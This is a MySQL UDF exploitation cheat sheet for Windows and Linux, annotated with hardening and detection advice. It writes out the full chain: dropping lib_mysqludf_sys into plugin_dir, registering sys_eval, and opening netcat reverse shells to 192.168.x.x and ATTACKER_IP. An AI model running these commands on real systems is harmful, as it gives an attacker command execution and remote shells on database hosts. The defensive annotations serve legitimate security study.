Discover Plugin Directory
-- Reads the server's plugin_dir variable: the directory from which the server
-- loads plugin and UDF shared libraries.
-- Hardening: the OS account running mysqld should not have write permission
-- on this directory.
SHOW VARIABLES LIKE 'plugin_dir';
-- Lists server plugins. UDFs registered with CREATE FUNCTION ... SONAME are not
-- plugins; when auditing, review mysql.func as well (and
-- performance_schema.user_defined_functions on MySQL 8.0+).
SHOW PLUGINS;
Windows UDF Exploitation
-- Reads a library from a remote SMB share and writes it into the plugin
-- directory. Both load_file() and INTO DUMPFILE need the FILE privilege and are
-- restricted by secure_file_priv; the write also needs the mysqld service
-- account to have write access to the target directory.
-- Mitigation: do not grant FILE to application accounts, set secure_file_priv
-- to a dedicated directory (or NULL), and block outbound SMB from the database host.
-- Detection: file-integrity monitoring on plugin_dir for new .dll files.
SELECT load_file('\\\\192.168.x.x\\share\\lib_mysqludf_sys_64.dll') INTO DUMPFILE 'C:\xampp\mysql\lib\plugin\udf.dll';
-- Registers a function backed by the dropped library. This requires INSERT on
-- the mysql system schema and leaves a row in mysql.func.
-- Detection: alert on CREATE FUNCTION ... SONAME in audit or general logs, and
-- on unexpected rows in mysql.func.
CREATE FUNCTION sys_bineval RETURNS INT SONAME 'udf.dll';
-- From here on the statements pass OS commands to the UDF. A UDF runs inside
-- the server process, so the commands run as the account that runs mysqld;
-- run the service under a dedicated low-privilege account, not
-- SYSTEM or an administrator.
SELECT sys_eval('whoami');
-- Maps a remote share from the database host.
-- Detection: mysqld spawning net.exe or cmd.exe is a strong anomaly in
-- process-creation telemetry.
SELECT sys_eval('net use X: \\192.168.x.x\kali /user:kali kali');
-- Starts an outbound interactive shell on port 80.
-- Mitigation: egress filtering on the database host, so that it cannot open
-- arbitrary outbound connections, including on common web ports.
SELECT sys_eval('X:\\nc.exe -e cmd.exe 192.168.x.x 80');
Linux UDF Exploitation
-- Copies a library from /tmp into the plugin directory. Both load_file() and
-- INTO DUMPFILE need the FILE privilege and are restricted by secure_file_priv;
-- the write succeeds only if the mysqld OS user can write to the plugin directory.
-- Mitigation: keep plugin_dir owned by root and not writable by the mysql user,
-- do not grant FILE to application accounts, and set secure_file_priv to a
-- dedicated directory (or NULL).
-- Detection: file-integrity monitoring on plugin_dir for new .so files.
SELECT load_file('/tmp/lib_mysqludf_sys.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
-- Registers a function backed by the dropped library. This requires INSERT on
-- the mysql system schema and leaves a row in mysql.func.
-- Detection: alert on CREATE FUNCTION ... SONAME in audit or general logs.
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
-- The commands passed to the UDF run as the OS user that runs mysqld.
-- Mitigation: never run mysqld as root; confine it with AppArmor/SELinux or
-- systemd sandboxing so that it cannot execute arbitrary binaries.
SELECT sys_eval('id');
-- Starts an outbound interactive shell.
-- Detection: mysqld spawning a shell or nc, or the database host opening
-- unexpected outbound connections; restrict egress from the host.
SELECT sys_eval('nc -e /bin/bash ATTACKER_IP 4444');